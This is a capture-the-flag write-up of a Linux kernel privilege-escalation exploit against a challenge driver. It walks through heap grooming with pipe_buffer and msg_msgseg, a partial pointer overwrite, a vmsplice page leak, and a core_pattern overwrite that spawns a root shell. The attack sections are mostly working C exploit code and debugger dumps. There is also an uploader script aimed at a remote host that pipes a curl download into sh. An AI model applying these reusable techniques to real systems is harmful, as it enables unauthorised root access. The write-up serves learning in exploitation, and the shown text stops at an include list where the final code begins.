0xffff888006494be0|+0x0be0|+380: 0xffff888006494bd0 <- victim's dependency (itself)
0xffff888006494be8|+0x0be8|+381: 0x6665722d666c6573 'self-referring event'
0xffff888006494bf0|+0x0bf0|+382: 0x6520676e69727265 'erring event'
0xffff888006494bf8|+0x0bf8|+383: 0x00000000746e6576 ('vent'?)
0xffff888006494c00|+0x0c00|+384: 0x0000000000000000
0xffff888006494c08|+0x0c08|+385: 0xa36fb47ca526c672 <- mangled freelist pointer
0xffff888006494c10|+0x0c10|+386: 0x0000000000000000
0xffff888006494c18|+0x0c18|+387: 0x0000000000000000
0xffff888006494c20|+0x0c20|+388: 0x0000000000000000
0xffff888006494c28|+0x0c28|+389: 0xdead000000000100
0xffff888006494c30|+0x0c30|+390: 0xdead000000000122
0xffff888006494c38|+0x0c38|+391: 0xffff8880060d9900 <- parent timeline
0xffff888006494c40|+0x0c40|+392: 0x000000000000089d <- start of next temporal_event
0xffff888006494c48|+0x0c48|+393: 0x0000000000000000
0xffff888006494c50|+0x0c50|+394: 0x0000000000000000
0xffff888006494c58|+0x0c58|+395: 0x6c6c612d74736f70 'post-alloc object'
0xffff888006494c60|+0x0c60|+396: 0x63656a626f20636f 'oc object'
0xffff888006494c68|+0x0c68|+397: 0x0000000000000074
0xffff888006494c70|+0x0c70|+398: 0x0000000000000000
0xffff888006494c78|+0x0c78|+399: 0xd36fb47ca526cd22
0xffff888006494c80|+0x0c80|+400: 0x0000000000000000
0xffff888006494c88|+0x0c88|+401: 0x0000000000000000
0xffff888006494c90|+0x0c90|+402: 0x0000000000000000
0xffff888006494c98|+0x0c98|+403: 0xdead000000000100
0xffff888006494ca0|+0x0ca0|+404: 0xdead000000000122
0xffff888006494ca8|+0x0ca8|+405: 0xffff8880060d9980  ->  0x0000000000000000
...

For reference here's the temporal_event struct:

struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};

Notice that the victim object spans 0xffff888006494bd0 - 0xffff888006494c3f, while the post-alloc object spans 0xffff888006494c40 - 0xffff888006494caf.

Furthermore, note that the victim's refcount is 0xbfffffff, meaning it has underflowed (saturated), and its causal_dependency pointer points to itself at 0xffff888006494bd0.

✍️ Another important note is that all the objects are spaced 0x70 = 112 bytes apart. This is a highly abnormal size which was made possible by the use of the dedicated slab cache. In practice, it is very difficult for us to find exploitable kernel objects of this exact size. Ideally we would want the object to have the same size as other objects in the kmalloc- or kmalloc-cg- caches.

⚠️ If we tried to reclaim the page by spraying objects of a different size and accidentally overwrote the causal_dependency pointer with an invalid non-null value, the kernel would crash when the loop in paradox_engine_release dereferences that pointer!

🧠 If we just overwrite causal_dependency with NULL, the loop simply terminates, and we don't use the infinite loop to kfree anything else. We basically "waste" the vulnerability.

👀 Ideally, we want to reclaim it with something that we can control so that we can control what we kfree next! If we overwrite the refcount to 1, and overwrite causal_dependency to something that can be kfreed, we will have a double allocation! But the problem with this is that we don't have any leaks 😢, so we don't know what to overwrite it with either!

💡 The eureka moment

I spent quite a few days spraying different objects to find out what could be a possible solution. As I was playing with pipe_buffer, I realised that very often the page storing the buffer's data would reclaim the victim page, and the data I write into the pipe would overwrite the bytes in the victim page. When we write into this page, we can overwrite the causal_weight refcount, followed by the temporal_event * .

This got me wondering: Is it possible that writing into this pipe could allow partial overwrites? What if instead of overwriting all 8 bytes of the temporal_event * I could just overwrite 1, or 2, or 3? 🤔

It turns out, you can!

Now let's think about what we can do with this in mind:

  • Spray pipe_buffer , one of their pages will reclaim the victim page

  • Since the refcount is always at a +0x8-aligned offset, first write 0x10 bytes into each pipe, then read those 0x10 bytes back to see if the last 8 bytes changed, for example to bytes containing 0xc0000000 or 0xbfffffff (the saturated refcount, which the spinning loop keeps decrementing). If they changed, we know the victim object is at offset +0x000 within the victim page, and we know which pipe holds the victim page.

    • Otherwise, if the victim object is not at offset +0x000, repeat the previous step with 0x20 bytes, then 0x30, and so on, until we find the offset of the victim object within the victim page and the pipe that holds it.

By doing this, we find the pipe holding the victim page and the offset of the victim object within it, all without touching the temporal_event * pointer. That's great!
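
Here's a hedged sketch of that probe loop (my full Part 2 spray code isn't shown in this post; PIPE_BUF_SPRAY0 is a made-up constant, but pipe_fds, changed_pipe and cursize are the same variables the later snippets use):

int pipe_fds[PIPE_BUF_SPRAY0][2];   // sprayed earlier with pipe()
int changed_pipe = -1;              // which pipe's data page holds the victim
size_t cursize = 0;                 // offset of victim's causal_dependency
char probe[0x1000] = {0}, back[0x1000];

for (size_t sz = 0x10; sz <= 0x1000 && changed_pipe < 0; sz += 0x10) {
    for (int i = 0; i < PIPE_BUF_SPRAY0; i++) {
        write(pipe_fds[i][1], probe, sz);
        read(pipe_fds[i][0], back, sz);   // the data page is reused next round
        if (memcmp(back + sz - 8, probe, 8) != 0) {
            // the spinning event_put loop keeps mutating the refcount,
            // so the qword we just wrote came back different
            changed_pipe = i;
            cursize = sz;   // causal_dependency sits at this offset;
                            // the victim object starts at sz - 0x10
            break;
        }
    }
}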

Now the question is: what do we do with our partial-overwrite primitive on the temporal_event *? To answer this, I took a quick look at the pages in the page allocator using the buddy-dump command to see if there was anything useful. At this point, my victim temporal_event was at 0xffff888006494bd0.

In the buddy-dump output I saw an order-9 unmovable page sitting at 0xffff888006600000, just above my victim object.

What is "order"?

The buddy allocator maintains blocks of free pages where each block is a power-of-two number of pages. The exponent of that power of two is referred to as the order. If the order is 3, for example, the block consists of 2^3 = 8 pages.

View this page for more info.

This is great for two reasons:

  1. If I overwrite the least significant 3 bytes of the temporal_event * with \x00\x00\x60 (in memory order, matching the code later), the pointer becomes exactly 0xffff888006600000

  2. This pattern is consistent across reboots! In another run, the self-referring event was at 0xffff88800654ea80 and the order-9 unmovable page was again at 0xffff888006600000.

👍 So if we do something like this:

  • Spray an object X to reclaim the order-9 page

  • Partially overwrite the temporal_event * to trigger a kfree on that address

  • Spray another object Y to reclaim the page again,

We could achieve an overlap between objects X and Y! Wonderful!

Part 3. Spraying enlarged pipe_buffers to claim the order-9 page

Now I was once again on the hunt for a new object. It had to be relatively large, so that I could get it to claim the order-9 page within a reasonable time, and it had to satisfy another constraint:

⚠️ Ideally, the value at offset +0x10 should be NULL. Why? Look at temporal_event and the infinite loop again:

struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};
static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
// paradox_engine_release snippet
while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}

In the first round of the loop, after we set refcount = 1 and do the partial overwrite, next_in_chain would be our page address. This then becomes cause.

In the second round of the loop, next_in_chain would be whatever is at page+0x10 .

If page+0x10 is not null, the third round of the loop would do cause->causal_dependency (which is actually (*cause).causal_dependency ) and dereference the value at page+0x10 .

We also have a third requirement: Whatever is at offset +0x8 of the page overlaps with what the program thinks is the temporal_event's refcount, so we should be able to set this to one if we actually want the reclaiming object to get freed using event_put.

📜 To summarise what we need of object X:

  • Relatively large

  • Value at +0x10 is (hopefully) null

  • Value at +0x8 == 1

I was once again stuck at this point for several days. And then I saw the light. How? By again playing with pipe_buffer. Let's look closely at this bad boy, shall we?

Note that pipe_buffer structs don't exist in isolation; rather, they are allocated as a contiguous array. There is another struct called pipe_inode_info which points to this ring of pipe_buffers via its pipe_inode_info.bufs field.

🟢 pipe_buffer actually satisfies the "relatively large" requirement since we can enlarge the array via the function fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) which changes the pipe ring size. (Here n should be a power of 2 according to this).

🟢 pipe_buffer also satisfies the third requirement since we can control the value of pipe_buffer->offset by reading from it.

struct pipe_buffer {
  struct page * page; +0x0
  unsigned int offset; +0x8
  unsigned int len; +0xc
  const struct pipe_buf_operations * ops; +0x10
  unsigned int flags; +0x18
  unsigned long private; +0x20
};  // size of a pipe_buffer is 0x28

At first glance, it seems useless as it literally has a pointer at offset +0x10. If we simply create a pipe_buffer object in our page then trigger the vulnerability, we would get cooked as *ops gets dereferenced and we get a crash somewhere down the line.

👼 But here's our saving grace: When a pipe_buffer gets released, its ops field actually gets nulled! This is fantastic for us, since we can simply allocate then release the first pipe_buffer in the ring to null out whatever is at offset +0x10! We are still free to use the rest of the pipe_buffers in the page for exploitation.

There's a catch, however: a non-privileged user has a limit to the max pipe_buffer size they can allocate, and this can be checked in /proc/sys/fs/pipe-max-size:

~ $ cat /proc/sys/fs/pipe-max-size
1048576 = 0x1000 * 0x100

After spraying a bit (and praying), I found that spraying just 50 of these max-sized pipes was sufficient to consistently claim the order-9 page.

So for this step, we just spray 50 of these max-sized pipes, then write 1 byte to and read 1 byte from each of them. The read triggers the release of the first pipe_buffer, which NULLs out its ops pointer. At the same time, it leaves pipe_buffer->offset = 1, which overlaps what the driver thinks is the refcount, so the ring page can be kfreed when event_put is called on it!

Here's the code for this part:

#define PIPE_BUF_SPRAY1 50

int pfds[PIPE_BUF_SPRAY1][2];
char* filler1 = malloc(0x1000);
memset(filler1, 'A', 0x1000);
int res;
// stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    res = pipe(pfds[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers\n" );
        return -1;
    }
    // enlarge
    // we can spray at most around 60 of these before we get cooked
    res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
    if (res < 0) {
        printf("fcntl %d failed!\n", i );
        return -1;
    }
    // write into bufs[0]
    res = write(pfds[i][1], filler1, 1);
    if (res < 0) {
        printf("write failed!\n" );
        return -1;
    }
}
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    // set the first pipe_buf's op field to NULL
    // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
    read(pfds[i][0], filler1, 1);
}

Part 4. Trigger vuln

As discussed previously, overwrite the victim object, setting its refcount to 1 and overwriting the least significant 3 bytes of its causal_dependency with \x00\x00\x60. This should cause the page claimed in the previous step to be freed!

To do so, free the victim pipe whose id we now know, and spray pipe_buffer again.

The issue here was that freeing this victim pipe sometimes caused the page to go into CPU 1's partial list, which I had no control over. This could have been due to some balancing of the per-cpu partial lists. To deal with this, I created some dummy pipes (calling pipe and writing into each one) and closed them just before closing the victim pipe.

This reclamation is only successful slightly less than 50% of the time, and it's where my exploit loses the bulk of its consistency.

Code:

// need to spray enough to push the victim pipe into free_area instead of cpu1 ?
int dummy_pipes[DUMMY_PIPES][2];
for (int i = 0; i < DUMMY_PIPES; i++) {
    int res = pipe(dummy_pipes[i]);
    if (res < 0) {
        printf("Failed to create pipe %d\n", i);
        break;
    }
}
for (int i = 0; i < DUMMY_PIPES; i++) {
    res = write(dummy_pipes[i][1], "a", 1);
    if (res < 0) {
        printf("Failed to write to pipe %d\n", i);
        break;
    }
    close(dummy_pipes[i][1]);
    close(dummy_pipes[i][0]);
}
close(pipe_fds[changed_pipe][1]);
close(pipe_fds[changed_pipe][0]);
usleep(1000);
// getchar();
char* buf = malloc(cursize + 3);
memset(buf, '\x00', cursize + 3);
buf[cursize - 0x8] = '\x01'; // refcount
// buf[cursize + 2] = '\xa0';
buf[cursize + 2] = '\x60';
// spray more pipe_buffer for the partial overwrite
int stage_2_pipes[PIPE_BUF_SPRAY2][2];
for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
    // printf("i: %d\n", i);
    int res = pipe(stage_2_pipes[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers %d\n", i);
        break;
    } 
    ret = write(stage_2_pipes[i][1], buf, cursize + 3);
    if (ret < 0) {
        printf("[x] Write!\n");
        break;
    }
}

Part 5. Overlapping objects X and Y

Now we need to choose an object Y which will overlap with our array of pipe_buffers. Since the vuln triggers the kfree on CPU 1 (that's where our infinite loop ran), this part has to be done on CPU 1; I achieved this by creating a thread and pinning it to CPU 1.

Note that our object should claim a page of order ≤ 2, because the re-released page is of order 2.

The ideal candidate here, of course, would be msg_msgseg, since we get pretty much full read + write control over its contents, and we can modify its size by controlling the size of the data we send using msgsnd. As we can freely modify its size, we can also control the order of the page it reclaims.

Background on System V IPC

Function Signatures:

int msgget(key_t key, int msgflg);
int msgsnd(int msqid, const void *msgp, size_t msgsz, int msgflg);
ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg);

To send messages via System V IPC, you first need to create a message queue as follows:

int qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);

Then using the queue id, you can send a message as such:

struct msgbuf {
	long mtype;
	char mtext[0x1000-0x30-0x8+0x400];
};
struct msgbuf *msg = malloc(sizeof(struct msgbuf));
msg->mtype = 6;
int ret = msgsnd(qid, msg, sizeof(msg->mtext), 0);
if (ret < 0) {
	printf("[x] msgsnd!\n");
	return -1;
}

and receive them as such:

msgrcv(msqid, leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);

Note: In msgrcv, you can specify IPC_NOWAIT | MSG_COPY if you don't want the underlying msg_msg or msg_msgseg structs to be freed when the message is received

Note: Specifying the message's mtype when sending and receiving messages allows you to specify which message you want. If your msgrcv mtype is 0, you just get the first message in the queue.

What is msg_msgseg?

First, understand that the msg_msg header is 0x30 bytes, and the transmitted data follows immediately after it. If the data sent exceeds (0x1000 - 0x30) = 0xfd0 bytes, the remaining data is carried in a msg_msgseg struct, which consists of an 8-byte next pointer followed by the rest of the data.

struct msg_msg {
	struct list_head m_list; +0x0
	long m_type; +0x10
	size_t m_ts;  +0x18
	struct msg_msgseg *next; +0x20
	void *security; +0x28
	/* the actual message follows immediately */
};

struct msg_msgseg {
	struct msg_msgseg *next;
	/* content follows immediately */
};
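
As a sanity check on the sizes used below, the mtext size 0x1000 - 0x30 - 0x8 + 0x400 is chosen so that the trailing msg_msgseg is exactly 0x400 bytes:

// mtext total: 0x1000 - 0x30 - 0x8 + 0x400 = 0x13c8 bytes
//   msg_msg    : 0x30 header + 0xfd0 data  -> fills one 0x1000 allocation
//   msg_msgseg : 0x08 next   + 0x3f8 data  -> 0x400 -> kmalloc-cg-1k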

I went ahead with a 0x400-sized msg_msgseg spray, and my msg_msgseg goes into kmalloc-cg-1k. When we do slub-dump kmalloc-cg-1k in gef, we can clearly see that the page order is 2, because num pages: 4. Therefore it is a good size to choose to maximise the chance of msg_msgseg reclaiming the page!

Here's my code for this segment:

#define NUM_MSGMSG 250
int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg() {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("[x] msgsnd %d!\n", i);
            return NULL; // thread function returns void *
        }
    }
    return NULL;
}
int main(){ 
...
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
...
}

Part 6. vmsplice syscall

Now that we have overlapping msg_msgseg and pipe_buffer structs, we need to think of how to get LPE.

One option was getting a kernel text leak from pipe_buffer->ops, then replacing ops with a pointer to a fake ops table (containing a stack pivot gadget) and doing kROP. But placing that fake table in userspace won't work since SMAP and SMEP are enabled.

After some research, I came across this exploit which had a similar msg_msgseg and pipe_buffer overlap.

What is vdso?

Wikipedia: vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode that is inherent when calling these same kernel space routines by means of the system call interface.

While vDSO is provided by the kernel, it resides within the user-space portion of a process's virtual address space.

By doing something like this:

#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})
// get vDSO addr
// https://man7.org/linux/man-pages/man3/getauxval.3.html
size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
struct iovec iov = {vvar, 1};
// vmsplice vDSO to the pipe, it will spill struct page of kernel text to the pipe
SYSCHK(vmsplice(mypipe[1], &iov, 1, 0));

We cause pipe_buffer->page to refer to the page struct corresponding to vDSO. That is, a page responsible for kernel text.

🤔 Why is this helpful?

With a leaked page* pointer from the pipe_buffer, we can change it to be the page responsible for any region of kernel text! We'll see why this is useful later.

Part 7. Leaking page* of kernel text

To recap what we've done, we:

  1. Sprayed msg_msgseg into the first 0x400 bytes of the page to reclaim the order 2 page

  2. Overwrote part of the msg_msgseg (to be specific, the second 0x28-byte chunk) with the spliced pipe_buffer, whose page * points at the vDSO's backing page

Now if we read from msg_msgseg we can get the page * leak! (Note: the ops * leak isn't really necessary)

int victim_msqid = -1;

struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
memset(leakmsg, 0, sizeof(struct leakmsgbuf));
leakmsg->mtype = 6;
char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
struct pipe_buffer *p;
for (int i = 0; i < NUM_MSGMSG; i++) {
    // read msg without freeing memory
    ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
    if (ret < 0) {
        perror("msgrcv"); 
        continue;
    }
    if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
        msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
        victim_msqid = ms_qids[i];
        printf("[+] Victim found! msqid: %d\n", victim_msqid);
        // print victim data
        for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
            printf("%02x ", leakmsg->mtext[i]);
        }
        printf("\n");
        p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
        break;
    }
}
/*
no kaslr leaks : 
- page leak: 0xffffea00000cf400
- pipe_buf_ops leak: 0xffffffff82c6fe80

kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

    struct pipe_buffer {
        void *page;
        unsigned int offset, len;
        void *ops;
        unsigned int flags;
        unsigned long private;
    };
*/
if (victim_msqid == -1) {
    printf("Victim msqid not found!\n");
    return -1;
}
void *page_leak;
memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
void *pipe_buf_ops_leak;
memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
printf("page leak: %p\n", page_leak);
printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);

Part 8 + 9. Overwriting the second pipe

Now what can we do with the page * leak? Well, there happens to be a piece of writable kernel data called core_pattern, which tells the kernel what to do when a process crashes.

From the Linux kernel documentation (/usr/src/linux/Documentation/sysctl/kernel.txt):

[/proc/sys/kernel/]core_pattern is used to specify a core dumpfile pattern name.

  • If the first character of the pattern is a '|', the kernel will treat the rest of the pattern as a command to run. The core dump will be written to the standard input of that program instead of to a file.

In other words, overwriting core_pattern with something starting with '|' causes whatever comes after to be run as a command by the kernel's usermode helper (as root) whenever a core dump is triggered!
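
For example, this is exactly the payload we'll write in Part 10:

~ $ cat /proc/sys/kernel/core_pattern
|/proc/%P/fd/666 %P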

But the question now is: Sure, we know the address of the page * pointing to vDSO, but how do we know the address of the page * responsible for core_pattern? It turns out that the offset between them is constant. By calculating the offset between the vDSO and core_pattern virtual addresses we can also calculate the offset between their respective page * structs!

In my case, I found:

// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60

The difference between the virtual addresses of vdso_image_64.data's page and core_pattern's page is 0x438000. For every 0x1000-byte page, there is a 64-byte struct page stored in vmemmap, so to calculate the difference between the corresponding struct page addresses you do 0x438000 / 4096 * 64, which equals 0x438000 >> 6 (right shift by 12 for the page size, left shift by 6 for sizeof(struct page)).

Looking at the pre-overwritten pipe_buffer:

struct pipe_buffer {
  struct page * page; +0x0
  unsigned int offset; +0x8
  unsigned int len; +0xc
  const struct pipe_buf_operations * ops; +0x10
  unsigned int flags; +0x18
  unsigned long private; +0x20
};  
  
  0xffff888006600000|+0x0000|+000: 0x0000000000000000 <- start of bufs[0] pipe_buffer
  0xffff888006600008|+0x0008|+001: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600010|+0x0010|+002: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600018|+0x0018|+003: 0x6161616161616161 'aaaaaaaaaaaaaaaa'
  0xffff888006600020|+0x0020|+004: 0x6161616161616161 'aaaaaaaa'
  0xffff888006600028|+0x0028|+005: 0xffffea00000cf400  ->  0x008c000000002204 <- start of bufs[1] pipe_buffer and the page leak!
  0xffff888006600030|+0x0030|+006: 0x0000000100000000
  0xffff888006600038|+0x0038|+007: 0xffffffff82c6fe80 <user_page_pipe_buf_ops>  ->  0x0000000000000000
  0xffff888006600040|+0x0040|+008: 0x0000000000000000
  0xffff888006600048|+0x0048|+009: 0x0000000000000000
  0xffff888006600050|+0x0050|+010: 0x6161616161616161

The len is already 1 (from the 1-byte write in Part 3). Pipe writes land at offset + len, so by leaving len untouched and setting pipe_buffer->offset = 0xa60 - 1, the next write starts exactly at page offset 0xa60, where core_pattern lives, letting us rewrite its entire content! We also need to set the PIPE_BUF_FLAG_CAN_MERGE flag in pipe_buffer->flags so that subsequent pipe writes get merged into this buffer, i.e. written straight into the physical page.

Here's the code for this part:

// modify struct page that will represent of `core_pattern`'s page
// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60
// the difference between the addresses of the pages of vdso_image_64.data and core_pattern is 0x438000
// for every 0x1000-byte page, there is a 64-byte struct page stored in vmemmap,
// so the difference between struct page addresses is 0x438000 / 0x1000 * 64, i.e. 0x438000 >> 6
// (right shift by 12 bits and left shift by 6 bits)
p->page += (0x438000 >> 6);
// Since p->len == 1, we need to subtract one on p->offset
p->offset = 0xa60 - 1;
p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
leakmsg->mtype = 7;
// overwrite the pipe_buffer with msg_msgseg (with our own modified pipe_buffer content)
int payload_msqids[0x100];
for (int i = 0; i < 0x100; i++) {
    payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}
for (int i = 0; i < 0x100; i++) {
    ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
    if (ret < 0) {
        printf("[x] msgsnd %d!\n", i);
        return -1;
    }
}

Part 10. Setting up the command + executing it for root shell

We still need to decide what to write into core_pattern so that a triggered crash gives us LPE. I used the same method as this exploit, which is to overwrite it with |/proc/%P/fd/666 %P\n. When a process crashes, the kernel then executes whatever file that process holds open at FD 666, passing the PID as an argument.

Then consider the following main:

int cfd[2];
char dummybuf[] = "abcd"; // must be writable: read() stores a byte into it

void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int main(int argc, char **argv) {
        // if we were invoked by the kernel via the overwritten core_pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
        // everything below is the normal exploit path, run before the crash
        setvbuf(stdout, 0, _IONBF, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}
        // ...
        // end of main
        for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        	dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    	}
    	printf("[+] Stage 7 done!\n");
    	// show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    	// getchar();
    
    	write(cfd[1], dummybuf, 1);
    	while (1) {
        	sleep(100);
    	}

    	return 0;
}

The child process:

  • Creates an in-memory file and copies the program's ELF image into it

  • Duplicates it to fd 666 (then closes the original), so it is reachable at /proc/CHILD-PID/fd/666

  • Waits for the parent's signal that the exploit is finished by doing read(cfd[0], dummybuf, 1)

When the parent executes write(cfd[1], dummybuf, 1), it signals the child that the exploit is done.

The child then triggers a crash by dereferencing NULL, causing the command we wrote into core_pattern to run: the executable at /proc/CHILD-PID/fd/666 is executed with the child's PID as an argument, giving us a root shell and the flag.

Compiling and sending the exploit to remote

According to ptr-yudai's blog post, it usually works fine to compile your exploit with musl-gcc (which makes the binary much smaller) and send it to the remote as base64. However, for some reason my exploit stopped working once I compiled it with musl-gcc: the third least-significant byte to overwrite in the partial-overwrite stage had changed. Once I adjusted that byte, the exploit worked again.

I also used the following uploader.py (generated by ChatGPT) to automate solving the PoW, sending the base64, and decoding it back into a binary on the remote:

#!/usr/bin/env python3
from pwn import *
import base64
import subprocess
import re

def solve_pow(pow_command):
    """Solve the proof of work challenge"""
    log.info(f"Solving PoW: {pow_command}")
    try:
        result = subprocess.run(pow_command, shell=True, capture_output=True, text=True, timeout=30)
        if result.returncode == 0:
            solution = result.stdout.strip()
            log.success(f"PoW solution: {solution}")
            return solution
        else:
            log.error(f"PoW failed: {result.stderr}")
            return None
    except Exception as e:
        log.error(f"PoW error: {e}")
        return None

def run(io, cmd):
    io.sendlineafter(b"$ ", cmd.encode())
    io.recvline()

def main():
    # Configuration
    USE_REMOTE = True  # Set to True for remote
    HOST = "159.223.33.156"
    PORT = 9102
    
    # Read exploit binary
    with open("./test", "rb") as f:
        payload = base64.b64encode(f.read()).decode('ascii')
    
    # Connect
    if USE_REMOTE:
        io = remote(HOST, PORT)
        
        # Handle PoW if present
        try:
            initial = io.recvuntil(b"solution:", timeout=5).decode()
            pow_match = re.search(r'curl -sSfL https://pwn\.red/pow \| sh -s ([^\s]+)', initial)
            if pow_match:
                challenge = pow_match.group(1)
                pow_command = f"curl -sSfL https://pwn.red/pow | sh -s {challenge}"
                solution = solve_pow(pow_command)
                if solution:
                    io.sendline(solution.encode())
                else:
                    log.error("Failed to solve PoW")
                    return
        except EOFError:
            pass  # No PoW challenge
    else:
        io = process("./run.sh")
    
    # Upload exploit
    run(io, 'cd /tmp')
    
    log.info("Uploading exploit...")
    for i in range(0, len(payload), 512):
        progress = f"{i//512 + 1}/{(len(payload) + 511)//512}"
        log.info(f"Uploading chunk {progress}")
        run(io, f'echo "{payload[i:i+512]}" >> b64exp')
    
    log.info("Setting up exploit...")
    run(io, 'base64 -d b64exp > exploit')
    run(io, 'rm b64exp')
    run(io, 'chmod +x exploit')
    
    log.success("Exploit uploaded!")
    io.interactive()

if __name__ == "__main__":
    main()

Afterthoughts

Although I spent a really long time on this challenge, in hindsight it was a really good idea to persevere with it. I learnt a ton about the workings of the Linux kernel's allocators and numerous kernel exploitation techniques.

Final code

Note: There is some unused code in here, but if you followed the entire post you should be able to comprehend the code just fine! 😄

#define _GNU_SOURCE
#include <err.h>          // err() used by SYSCHK
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/sendfile.h> // sendfile()
#include <sys/uio.h>      // struct iovec for vmsplice()
#include <netinet/in.h>
#include <sys/auxv.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
